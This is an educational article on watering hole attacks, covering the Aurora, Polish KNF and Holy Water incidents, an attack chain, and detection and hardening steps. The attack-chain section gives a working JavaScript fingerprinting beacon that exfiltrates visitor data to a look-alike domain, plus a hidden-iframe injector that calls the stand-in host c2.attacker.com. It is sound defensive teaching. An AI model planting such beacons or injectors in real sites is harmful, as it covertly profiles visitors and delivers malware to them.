In February 2017, a bank’s security team was reviewing the JavaScript source code of the Polish Financial Supervision Authority (KNF) website — a regulatory portal they were required to visit regularly. They found something unexpected: an obfuscated JavaScript snippet that fingerprinted visitors and selectively redirected specific targets to an exploit kit landing page. The KNF site had been compromised. The attackers had turned the regulator’s own website into a trap for the banks it supervised.

This is the defining characteristic of a watering hole attack: the victim comes to the attacker’s malware willingly, on a trusted site, via a routine business task. No phishing email. No suspicious link. No social engineering of the target — only of the third-party site they trust.


Attack Concept and Strategic Logic

Spearphishing targets the individual. Watering hole attacks target the site the individual visits.

The strategic logic is compelling for attackers:

  • High-value targets often have strong email filtering and security-aware employees trained to recognize phishing.
  • But those same employees visit industry sites, regulatory portals, tool vendor documentation, and community forums as a legitimate part of their work.
  • A compromised industry site may reach hundreds of employees across dozens of target organizations simultaneously.
  • The attack infrastructure is hosted on a domain with legitimate reputation history, bypassing URL reputation and web categorization blocks.

The term “watering hole” is an analogy to predator-prey ecology: rather than chasing prey across an open plain (directly targeting the victim), the predator positions itself at the water source and waits.


Real Incidents

Operation Aurora (2009–2010)

Operation Aurora targeted at least 34 companies including Google, Adobe, Juniper Networks, and Rackspace. The attack, attributed to China-based threat actors (tracked by Symantec as the Elderwood Group and linked by other vendors to APT17), involved zero-day exploitation of Internet Explorer (CVE-2010-0249) delivered from a compromised website acting as the watering hole.

The JavaScript exploit triggered when target employees visited the infected page and used the vulnerable IE version. The payload granted persistent access and was used to exfiltrate intellectual property and access Google’s source code repository. Google disclosed the breach publicly in January 2010, attributing it to China — a rare and consequential disclosure at the time.

CVE-2010-0249 — Internet Explorer use-after-free vulnerability in the HTML object element. CVSS 9.3. Exploited as a zero-day in Operation Aurora.

Polish Financial Supervision Authority (2017)

In early 2017, threat actors (tentatively linked to the Lazarus Group based on code overlaps) compromised the KNF website and injected a JavaScript snippet that:

  1. Collected browser metadata from every visitor.
  2. Selectively redirected specific visitors (identified by IP range and browser fingerprint corresponding to target banks) to an exploit kit.
  3. Deployed banking malware to compromise the internal networks of Polish financial institutions.

The selective targeting — affecting only a subset of visitors — made the injection harder to detect via casual site review.

Holy Water Campaign (2019–2020)

Documented by Kaspersky in 2020, the Holy Water campaign targeted religious and political figures associated with an Asian religious and ethnic minority. The attackers compromised multiple websites serving this community and used a two-stage delivery:

  1. A JavaScript beacon profiled visitors.
  2. Visitors matching the target profile were redirected to a fake Adobe Flash updater that installed the GODLIKE12 backdoor.

The campaign ran undetected for approximately a year.

Security Researcher Campaign (2021) — Attribution: Lazarus Group

In January 2021, Google's Threat Analysis Group (TAG) documented a campaign in which North Korean threat actors (Lazarus) lured members of the security research community to attacker-controlled websites, including a fake research blog. Visiting the site with a fully patched Chrome delivered an exploit chain (not fully detailed at the time of disclosure) — security researchers are a high-value target for a nation-state interested in the defensive tools and unpublished vulnerabilities they hold.


Technical Attack Chain

Step 1: Target Profiling and Site Selection

Attackers identify candidate watering holes using:

  • Web analytics reconnaissance: Sites can embed tracking pixels or use ad networks that surface audience demographic data.
  • OSINT: Industry associations, regulatory bodies, trade publications, niche forums, conference sites.
  • Social media: LinkedIn profiles of target employees often reveal what professional communities and sites they frequent.

The ideal candidate site has:

  • A high-value, targeted audience (security researchers, financial executives, defense contractors).
  • Weak security posture (outdated CMS, no WAF, minimal security team).
  • Legitimate SSL certificate and domain reputation.

Step 2: Site Compromise

Common compromise methods:

- CMS vulnerability exploitation (WordPress plugin CVEs, Drupal SA advisories)
- Credential stuffing against site admin panels
- SQL injection to gain database access and escalate to OS shell
- Compromising the hosting provider or web developer
- Supply chain via third-party JavaScript libraries included by the target site
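
Several of these compromise paths begin with version reconnaissance against the candidate site. A defensive sketch for auditing your own site's version disclosure — the URL is a placeholder, and only sites you are authorized to assess should be tested:

```python
# Check a page for CMS version disclosure via <meta name="generator"> tags,
# one of the reconnaissance signals attackers use when selecting a watering hole.
import re
import urllib.request

def find_generator_tags(html: str) -> list[str]:
    """Return contents of <meta name="generator"> tags, which often
    leak the CMS name and version (e.g. 'WordPress 5.8.1')."""
    return re.findall(
        r'<meta[^>]+name=["\']generator["\'][^>]+content=["\']([^"\']+)["\']',
        html, re.IGNORECASE)

def audit(url: str) -> list[str]:
    """Fetch a page you are authorized to test and report generator tags."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        html = resp.read().decode("utf-8", errors="replace")
    return find_generator_tags(html)

# Offline example: a leaked version string detected in raw HTML
sample = '<meta name="generator" content="WordPress 5.8.1">'
print(find_generator_tags(sample))  # ['WordPress 5.8.1']
```

A non-empty result means the site advertises its CMS version to anyone who asks — a strong signal to enable version hiding and prioritize patching.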

Step 3: Victim Fingerprinting via JavaScript Beacon

Once site access is gained, the attacker injects a JavaScript fingerprinting beacon. The beacon profiles visitors and sends metadata to the attacker’s infrastructure. Only visitors matching the target profile receive the exploit payload — this selective delivery is a signature of sophisticated watering hole campaigns.

// Victim fingerprinting beacon — representative example of techniques
// used in documented watering hole campaigns (Holy Water, Polish KNF, etc.)
// For educational and detection purposes.

(function() {
    'use strict';

    var beacon = {};

    // Collect browser and system information
    beacon.ua = navigator.userAgent;
    beacon.lang = navigator.language || navigator.userLanguage;
    beacon.platform = navigator.platform;
    beacon.cookieEnabled = navigator.cookieEnabled;
    beacon.doNotTrack = navigator.doNotTrack;
    beacon.screenWidth = screen.width;
    beacon.screenHeight = screen.height;
    beacon.colorDepth = screen.colorDepth;
    beacon.timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
    beacon.timezoneOffset = new Date().getTimezoneOffset();

    // Plugin enumeration (reduced in modern browsers but still useful)
    var plugins = [];
    for (var i = 0; i < navigator.plugins.length; i++) {
        plugins.push(navigator.plugins[i].name);
    }
    beacon.plugins = plugins.join(',');

    // Canvas fingerprinting
    var canvas = document.createElement('canvas');
    var ctx = canvas.getContext('2d');
    ctx.textBaseline = 'top';
    ctx.font = '14px Arial';
    ctx.fillText('fingerprint', 2, 2);
    beacon.canvasFP = canvas.toDataURL().slice(-50);

    // Network information (if available)
    if (navigator.connection) {
        beacon.effectiveType = navigator.connection.effectiveType;
        beacon.downlink = navigator.connection.downlink;
    }

    // Encode and exfiltrate to C2
    var encoded = btoa(JSON.stringify(beacon));

    // Delivery via image pixel (image loads are governed by CSP img-src,
    // so this sidesteps connect-src restrictions on fetch/XHR)
    var img = new Image();
    img.src = 'https://analytics.legitimate-looking-domain.com/px?' +
              'v=' + encoded +
              '&r=' + encodeURIComponent(document.referrer) +
              '&t=' + Date.now();

    // If target matches criteria: inject iframe with exploit
    // Criteria checked server-side based on IP, UA, and fingerprint data
    // Server responds with 302 redirect or a 1x1 pixel containing exploit trigger
})();
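
For defenders, one triage heuristic for spotting injected beacons like the one above is character-level Shannon entropy: readable application code scores lower than packed or base64-wrapped payloads. A sketch — the threshold and samples are illustrative, not calibrated detection boundaries:

```python
# Heuristic triage for obfuscated JavaScript: packed or base64-heavy
# payloads tend to have higher Shannon entropy than hand-written code.
import math
from collections import Counter

def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of the input string."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def looks_obfuscated(script: str, threshold: float = 5.0) -> bool:
    return shannon_entropy(script) > threshold

readable = "function add(a, b) { return a + b; }"
packed = "eval(atob('KGZ1bmN0aW9uKCl7dmFyIGI9e307Yi51YT1uYXZpZ2F0b3IudXNlckFnZW50'))"
print(shannon_entropy(readable) < shannon_entropy(packed))  # True
```

Entropy alone produces false positives on legitimately minified bundles, so it is best used to rank scripts for human review rather than to alert directly.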

Step 4: iframe Injection for Exploit Delivery

For profiled visitors who match the target criteria, the C2 server returns JavaScript that injects a hidden iframe pointing to the exploit landing page:

// Iframe injection — delivers the exploit kit to profiled targets
// The iframe is sized 0x0 and hidden to avoid visual detection

function injectExploitFrame(exploitUrl) {
    var iframe = document.createElement('iframe');
    iframe.setAttribute('src', exploitUrl);
    iframe.setAttribute('width', '0');
    iframe.setAttribute('height', '0');
    iframe.setAttribute('style', 'display:none;border:0;margin:0;padding:0;');
    // Note: real attacks omit the sandbox attribute entirely — an empty
    // sandbox value would apply all restrictions and block the exploit script
    document.body.appendChild(iframe);
}

// C2 callback evaluates the fingerprint ('beacon' is the object built in
// Step 3) and returns an exploit URL for matching targets
fetch('https://c2.attacker.com/check', {
    method: 'POST',
    body: JSON.stringify(beacon),
    headers: {'Content-Type': 'application/json'}
})
.then(r => r.json())
.then(data => {
    if (data.target === true) {
        injectExploitFrame(data.exploitUrl);
    }
});

Step 5: Drive-By Exploit Execution

The exploit landing page delivers browser exploits targeting:

  • JavaScript engine vulnerabilities: V8 (Chrome), SpiderMonkey (Firefox), JavaScriptCore (Safari).
  • Browser renderer bugs: Use-after-free, type confusion, out-of-bounds write in HTML/CSS parsing.
  • Plugin vulnerabilities: Adobe Reader (PDF rendering), Java applets (legacy), Flash (end-of-life).

Example CVEs used in documented watering hole campaigns:

CVE              Browser/Component                       Used In
CVE-2010-0249    Internet Explorer                       Operation Aurora
CVE-2016-7255    Windows kernel (privilege escalation)   STRONTIUM (APT28) campaigns
CVE-2019-5786    Chrome FileReader UAF                   Various APT campaigns
CVE-2021-1879    WebKit (iOS Safari)                     iOS watering hole (FORCEDENTRY precursor)
CVE-2022-0609    Chrome Animation UAF                    North Korean watering hole (TAG disclosure)

Detection

Proxy Log Analysis for Suspicious JavaScript Sources

# Extract unique JavaScript source domains from proxy logs
# (Squid, Bluecoat, Zscaler, etc.)

# Squid log format: timestamp elapsed client request_status/code bytes method URL
awk '{print $7}' /var/log/squid/access.log |
    grep -E "\.(js|mjs)(\?|$)" |
    sed 's|https\?://||; s|/.*||' |
    sort | uniq -c | sort -rn |
    head -50

# Flag: JS loaded from domains not in your approved CDN/vendor list
# Especially watch for: newly registered domains, IDN homoglyph domains,
# domains that are slight misspellings of known CDNs

Splunk SPL — Detect JavaScript loaded from suspicious external domains:

index=proxy
| rex field=url "https?://(?P<domain>[^/]+)"
| where isnotnull(domain)
| rex field=url "\.(?P<ext>[a-z]{2,5})(\?|$)"
| where ext="js" OR ext="mjs"
| where NOT match(domain, "(?i)(jquery|cloudflare|googleapis|akamai|cdn|bootstrapcdn|microsoft|google\.com)")
| stats count by domain, src_ip
| where count > 5
| sort - count

Threat Intelligence Feed Integration

import requests

# Query URLhaus (abuse.ch) for known malicious URLs
# Check if any URLs in proxy logs match current watering hole IOCs

def check_urlhaus(url):
    api_endpoint = "https://urlhaus-api.abuse.ch/v1/url/"
    r = requests.post(api_endpoint, data={"url": url}, timeout=10)
    r.raise_for_status()
    return r.json()

# Example — check URLs from proxy log
suspicious_urls = [
    "http://compromised-site.example.com/analytics.js",
    "http://conference-portal.example.org/track.js"
]

for url in suspicious_urls:
    result = check_urlhaus(url)
    if result.get("query_status") == "ok":  # URL is present in the URLhaus database
        print(f"MALICIOUS: {url} | Tags: {result.get('tags', [])}")
    else:  # "no_results" (not listed) or "invalid_url"
        print(f"Clean (not in URLhaus): {url}")

Browser Telemetry and EDR Correlation

Modern EDRs with browser telemetry can log:

  • Every URL visited by browser processes.
  • JavaScript execution context (which origin executed which script).
  • Network connections initiated by browser child processes.
  • Process injection attempts from browser sandbox escape exploits.

Key indicators to alert on:

- Browser process (chrome.exe, firefox.exe) spawning a child process (cmd.exe, powershell.exe, wscript.exe)
- Browser process making outbound connections to non-browsed IPs
- DLL injection into browser process from an unsigned DLL
- Browser process creating files in %TEMP%, %APPDATA%, or %STARTUP%
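
The first indicator above can also be checked offline against any process snapshot export. A sketch — the (pid, ppid, name) tuple format is an assumption; adapt it to whatever your EDR or `ps`/`Get-Process` export provides:

```python
# Flag "browser spawned a shell" chains in a process snapshot.
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def suspicious_children(processes):
    """processes: iterable of (pid, ppid, name) tuples.
    Returns (parent_name, child_name) pairs where a browser spawned a shell."""
    by_pid = {pid: name.lower() for pid, _, name in processes}
    hits = []
    for pid, ppid, name in processes:
        parent = by_pid.get(ppid, "")
        if parent in BROWSERS and name.lower() in SHELLS:
            hits.append((parent, name.lower()))
    return hits

snapshot = [
    (100, 1, "explorer.exe"),
    (200, 100, "chrome.exe"),
    (300, 200, "powershell.exe"),   # browser -> shell: suspicious
    (400, 100, "notepad.exe"),
]
print(suspicious_children(snapshot))  # [('chrome.exe', 'powershell.exe')]
```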

Sysmon/Splunk — Browser spawning shell:

index=sysmon EventCode=1
| where match(ParentImage, "(?i)(chrome|firefox|msedge|iexplore)\.exe$")
| where match(Image, "(?i)(cmd|powershell|wscript|mshta|cscript)\.exe$")
| table _time, host, user, ParentImage, Image, CommandLine
| sort - _time

Defense and Mitigation

1. Browser Isolation (Remote Browser Isolation — RBI)

RBI is the most complete technical control. All browsing of external/uncategorized sites occurs in a disposable container. The endpoint receives only a pixel stream — no code executes locally.

Deploy for:

  • All browsing of internet sites by high-risk user populations (executives, finance, IT).
  • Access to all uncategorized or newly-registered domains.
  • Access to third-party portals required for business (regulatory sites, vendor portals).

2. Content Security Policy (CSP) — Protect Your Own Site

You cannot add CSP headers to third-party sites. But you can protect your own site from being used as a watering hole:

# Nginx — enforce strict CSP to prevent script injection.
# Note: the header value must stay on one line — literal newlines inside
# an nginx quoted string are sent verbatim and break the HTTP header.
add_header Content-Security-Policy "default-src 'self'; script-src 'self' 'nonce-{RANDOM_NONCE}' https://cdn.trusted-vendor.com; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com; img-src 'self' data: https:; font-src 'self' https://fonts.gstatic.com; object-src 'none'; base-uri 'self'; frame-ancestors 'none'; form-action 'self'; upgrade-insecure-requests" always;

# Also add these security headers
add_header X-Frame-Options "DENY" always;
add_header X-Content-Type-Options "nosniff" always;
add_header Referrer-Policy "strict-origin-when-cross-origin" always;

Subresource Integrity (SRI) — prevent CDN-based injection:

<!-- SRI ensures the CDN-served script matches the expected hash -->
<!-- If a CDN is compromised (third-party supply chain attack), the browser rejects the tampered file -->
<script
    src="https://cdn.jsdelivr.net/npm/jquery@3.7.1/dist/jquery.min.js"
    integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo="
    crossorigin="anonymous">
</script>
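
When pinning third-party scripts, the integrity value can be computed locally. A sketch — the input bytes here are illustrative; in practice, hash the downloaded file read in binary mode:

```python
# Compute an SRI integrity value: "<algo>-" + base64 of the raw digest,
# the same format browsers validate against the integrity attribute.
import base64
import hashlib

def sri_hash(data: bytes, algo: str = "sha384") -> str:
    digest = hashlib.new(algo, data).digest()
    return algo + "-" + base64.b64encode(digest).decode("ascii")

# Example with an illustrative script body
print(sri_hash(b"console.log('hello');"))
```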

3. DNS Filtering and Web Categorization

Deploy DNS-layer filtering (Cisco Umbrella, Cloudflare Gateway, Zscaler) to:

  • Block newly registered domains (high risk of being attacker-controlled infrastructure).
  • Block uncategorized domains.
  • Enable SafeSearch enforcement.
  • Alert on DNS queries to domains with low Tranco rank (the successor to the retired Alexa ranking) that don’t match expected traffic patterns.

# Blocked DNS categories to consider (Umbrella-style categorization):
# - Newly Seen Domains (less than 30 days old)
# - Dynamic DNS
# - Parked Domains
# - Malware / Command and Control
# - Cryptomining

# Using Pi-hole or similar for on-premises DNS filtering:
# `pihole -b` blocks individual domains; bulk blocklists are added as
# adlist sources (via the admin UI), not passed to -b as a filename
pihole -b suspicious-newly-registered-domain.example.com
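
The low-rank alert above can be approximated offline by diffing observed domains against a downloaded ranking snapshot. A sketch assuming a local Tranco-style CSV of rank,domain rows — the file path and sample inputs are placeholders:

```python
# Flag proxy-log domains absent from a local top-sites list. Absence is a
# weak signal on its own, but useful for prioritizing analyst review.
import csv

def load_ranked_domains(path: str) -> set:
    """Read a rank,domain CSV (e.g. a downloaded Tranco list)."""
    with open(path, newline="") as f:
        return {row[1].strip().lower() for row in csv.reader(f) if len(row) >= 2}

def flag_unranked(domains, ranked: set) -> list:
    return [d for d in domains if d.lower() not in ranked]

# Offline example with placeholder data
seen = ["cdn.jsdelivr.net", "analytics.legitimate-looking-domain.com"]
ranked = {"cdn.jsdelivr.net", "google.com"}
print(flag_unranked(seen, ranked))  # ['analytics.legitimate-looking-domain.com']
```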

4. Browser Hardening and Update Cadence

Outside of true zero-day use — which is rare and expensive — browser exploit chains require an unpatched browser, which makes an aggressive patch cadence the single most impactful control:

# Check Chrome version across the fleet (query the binary directly;
# Win32_Product is slow and can trigger MSI reconfiguration)
(Get-Item "C:\Program Files\Google\Chrome\Application\chrome.exe").VersionInfo |
    Select-Object ProductName, ProductVersion

# Force frequent Chrome update checks via registry (managed devices)
reg add "HKLM\SOFTWARE\Policies\Google\Update" /v AutoUpdateCheckPeriodMinutes /t REG_DWORD /d 60 /f
reg add "HKLM\SOFTWARE\Policies\Google\Update" /v UpdateDefault /t REG_DWORD /d 1 /f

Browser security settings to enforce via policy:

  • Disable Java, Flash, and other legacy plugins.
  • Enable strict site isolation (--site-per-process in Chromium-based browsers).
  • Enable Enhanced Protection mode in Chrome Safe Browsing.
  • Disable extension installation from outside the corporate extension store.
  • Enable JIT hardening where available.

5. Third-Party Site Risk Assessment

For external sites that business operations require regular access to (regulatory portals, vendor sites, industry forums):

  • Subscribe to site change monitoring services to detect JavaScript modifications.
  • Use browser developer tools to audit which external scripts each required site loads.
  • Report anomalies to site owners promptly — the Polish KNF incident was discovered by a diligent bank security team.

# Monitor third-party site JavaScript for changes using curl + sha256sum
curl -s https://required-vendor-portal.com/static/app.js | sha256sum | awk '{print $1}' > baseline_hash.txt

# Run daily — alert on hash change
NEW_HASH=$(curl -s https://required-vendor-portal.com/static/app.js | sha256sum | awk '{print $1}')
BASELINE=$(cat baseline_hash.txt)
if [ "$NEW_HASH" != "$BASELINE" ]; then
    echo "ALERT: JavaScript hash changed on required-vendor-portal.com"
    # Send alert to SOC
fi
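
The developer-tools audit in the list above can also be scripted. A sketch that parses saved page HTML and lists third-party script hosts — the sample HTML and hostnames are illustrative:

```python
# List external <script src> hosts on a page, for auditing which
# third-party domains a required portal pulls JavaScript from.
from html.parser import HTMLParser
from urllib.parse import urlparse

class ScriptSrcParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.srcs = []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)

def external_script_hosts(html: str, site_host: str) -> list:
    p = ScriptSrcParser()
    p.feed(html)
    hosts = {urlparse(s).netloc for s in p.srcs if urlparse(s).netloc}
    return sorted(h for h in hosts if h != site_host)

sample = ('<script src="/app.js"></script>'
          '<script src="https://analytics.unknown-tracker.example/px.js"></script>')
print(external_script_hosts(sample, "portal.example.org"))
# ['analytics.unknown-tracker.example']
```

Any host in the output that is not on your approved vendor list is a candidate for the hash-monitoring loop above it.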

